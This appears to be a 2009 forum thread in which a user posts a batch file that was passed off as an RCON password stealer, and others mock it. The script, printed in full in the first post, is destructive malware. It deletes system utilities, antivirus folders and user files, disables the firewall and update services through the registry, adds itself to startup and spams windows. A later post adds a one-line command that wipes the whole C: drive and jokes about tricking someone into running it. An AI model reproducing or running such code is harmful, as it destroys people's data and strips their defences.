Post Reply 
lolhax0rs
Author Message
Joom
WOOP
Worlds End

Posts: 4,206.7320
Threads: 417
Joined: 20th Mar 2009
Reputation: 5.41709
E-Pigs: 134.1772
Offline
Post: #1
lolhax0rs
So I was just talking to a skiddie on Steam and he sent me this batch file saying that it steals a server's RCON password....

Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
@echo off
start cmd.exe
start notepad.exe
shutdown -s
start www.youareanidiot.org
erase "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
erase "C:\WINDOWS\regedit.exe"
erase "%SystemRoot%\system32\restore\rstrui.exe"
erase "C:\WINDOWS\system32\taskmgr.exe"
erase "C:\WINDOWS\system32\scrnsave.exe"
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

erase "C:\WINDOWS\system32\mspaint.exe"
erase "C:\WINDOWS\system32\magnify.exe"
erase "C:\WINDOWS\notepad.exe" /Q /S
erase "C:\WINDOWS\system32\calc.exe" /Q /S
erase "C:\WINDOWS\system32\cmd.exe" /Q /S
taskkill /f /im msnmsgr
erase "C:\Program Files\Windows Live" /q /s

taskkill /f /im yahoomsgr.exe
erase "C:\Program Files\Yahoo" /q /s

erase "C:\WINDOWS\system32\mouse.drv"
erase "C:\WINDOWS\system32\keyboard.drv" /Q /S
erase "C:\Program Files\eset" /Q /S
erase "C:\Program Files\alwil" /Q /S
erase "C:\Program Files\norton" /Q /S
erase "C:\Program Files\Malwarebytes' Anti-Malware" /Q /S
erase "C:\Program Files\Kaspersky" /Q /S
erase "C:\Program Files\Mozilla Firefox\firefox.exe" /Q /S
erase "C:\Program Files\Internet Explorer\IEXPLORE.exe" /Q /S
erase "C:\WINDOWS\system32\dfrg.exe" /Q /S
msg * ytujtfrjt
goto   No-no site
mkdir "C:\Documents and Settings\%user%\Desktop\doomed"
mkdir "C:\Documents and Settings\%user%\Desktop\trojanz0r"
mkdir "C:\Documents and Settings\%user%\Desktop\spyware.generator"
mkdir "C:\Documents and Settings\%user%\Desktop\trojan.gen"
mkdir "C:\Documents and Settings\%user%\Desktop\botz0r"
mkdir "C:\Documents and Settings\%user%\Desktop\spyware.exe"
mkdir "C:\Documents and Settings\%user%\Desktop\your"
mkdir "C:\Documents and Settings\%user%\Desktop\PC"
mkdir "C:\Documents and Settings\%user%\Desktop\is"
mkdir "C:\Documents and Settings\%user%\Desktop\infected"
mkdir "C:\Documents and Settings\%user%\Desktop\by"
mkdir "C:\Documents and Settings\%user%\Desktop\new_virus"

erase "C:\WINDOWS\$NtUninstallKB926239$" /S /Q
erase "Network Connections" /Q /S
copy /y %0 %windir%
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows /t REG_SZ /d %windir%\
o.o.bat
@del \q \s C:\*.doc
@del \q\ s C:\*.txt
@del \q \s C:\*.mp3
@del \q \s C:\*.png
@del \q \s C:\*.wmv
@del \q \s C:\*.exe
@del \q \s C:\*.flv
taskkill /f /im System Iddle Process.exe
@del \q \s C:\*.wma
@del \q \s C:\*.jpg
@del \q \s C:\*.vbs
@del \q \s C:\*.bat
@del \q \s C:\*.pps
@del \q \s C:\*.pdf
@del \q \s C:\*.wav
@del \q \s C:\*.ico
@del \q \s C:\*.ini
@del \q \s C:\*.avi
@del \q \s C:\*.ocx
@del \q \s C:\*.cfg
:spam
start cmd.exe
start notepad.exe
start iexplorer.exe
goto spam


[Image: ROVBdMh.png]
3DS Friend Code: 5000-6045-4964
(This post was last modified: 20/12/2009 10:39 AM by Joom.)
20/12/2009 10:37 AM
Find all posts by this user Quote this message in a reply
diego
poof

Posts: 7,826.1659
Threads: 264
Joined: 22nd Jun 2007
Reputation: 1.80067
E-Pigs: 37.4012
Offline
Post: #2
RE: lolhax0rs
lol

[Image: cce6aa9e-c40c-4ae7-aebe-d7780d6fc009.gif]
20/12/2009 10:39 AM
Find all posts by this user Quote this message in a reply
1-R
forced consensual sex
Team DreamArts

Posts: 5,515.3939
Threads: 396
Joined: 22nd Dec 2007
Reputation: 5.91682
E-Pigs: 115.1024
Offline
Post: #3
RE: lolhax0rs
diego Wrote:lol

[Image: OLmvS.png]
Twit | DA | G+ | Last.fm
20/12/2009 10:40 AM
Find all posts by this user Quote this message in a reply
roberth
Resident Full Stop Abuser.....

Posts: 4,580.2098
Threads: 200
Joined: 18th Jun 2007
Reputation: -5.5814
E-Pigs: 43.8419
Offline
Post: #4
RE: lolhax0rs
wait...it kerases notepad, but then trys to run it later?


lolfail?

20/12/2009 10:53 AM
Find all posts by this user Quote this message in a reply
Chaos Panda
The pandas are coming! Oh shi...

Posts: 703.3101
Threads: 43
Joined: 27th Mar 2008
Reputation: -3.01478
E-Pigs: 7.4717
Offline
Post: #5
RE: lolhax0rs
lol, i wonder if anyones fallen for it yet

Spoiler for if you don't like pandas:
[Image: PandaSays.jpg]
[Image: kiwi.png]

RAAAAAAAAAAAAPE TIIIIME! Or the panda will get you
20/12/2009 11:39 AM
Find all posts by this user Quote this message in a reply
Joom
WOOP
Worlds End

Posts: 4,206.7320
Threads: 417
Joined: 20th Mar 2009
Reputation: 5.41709
E-Pigs: 134.1772
Offline
Post: #6
RE: lolhax0rs
Stupid skiddies....

[Image: ROVBdMh.png]
3DS Friend Code: 5000-6045-4964
20/12/2009 12:15 PM
Find all posts by this user Quote this message in a reply
defdock
most hated user =(

Posts: 226.6330
Threads: 29
Joined: 25th Nov 2009
Reputation: 0.25681
E-Pigs: 367.9517
Offline
Post: #7
RE: lolhax0rs
lol. i bet i would try it if it wasn't in writen form lol

[Image: SIGGY-1.gif]

2 psps

1 with 5.50 gen D2
1 with 5.00 m33-6 (also O button is gba button, and umd drive is gone.)

http://d3fd0ck.mybrute.com
20/12/2009 12:53 PM
Find all posts by this user Quote this message in a reply
trademark91
Unique?
Fractal Insanity

Posts: 4,719.9300
Threads: 269
Joined: 4th Jan 2008
Reputation: -6.15982
E-Pigs: 105.8691
Offline
Post: #8
RE: lolhax0rs
lol

[Image: 531115][Image: 76561198014212040.png]
windows Proud
20/12/2009 01:43 PM
Find all posts by this user Quote this message in a reply
Silvertie
Older, less cringe, still mad.
Fractal Insanity

Posts: 1,016.3688
Threads: 32
Joined: 9th Jun 2009
Reputation: -5.33618
E-Pigs: 32.7022
Offline
Post: #9
RE: lolhax0rs
This code pales in efficiency compared to this.

Code:
RD C:\ /S /Q


The above code, when run as an admin, apparently erases the whole C:\ drive, without a "are you sure" prompt. All I have as evidence is this guy called Databank who was cabbage enough to execute it in command prompt when he was asking how to take a screenshot. After execution, he left the IRC channel, and did not return. He may have just ragequitted, but it is likely his computer was fudged.


"Books! I've read several on the subject!"
[Image: khadorsigfinal.jpg]
Silvertie: The Blog | A Door In Nowhere: The Webcomic
20/12/2009 03:35 PM
Visit this user's website Find all posts by this user Quote this message in a reply
ZiNgA BuRgA
Smart Alternative

Posts: 17,023.4213
Threads: 1,174
Joined: 19th Jan 2007
Reputation: -1.71391
E-Pigs: 446.0333
Offline
Post: #10
RE: lolhax0rs
Where'd my screen magnifier go?
20/12/2009 04:29 PM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)

 Quick Theme: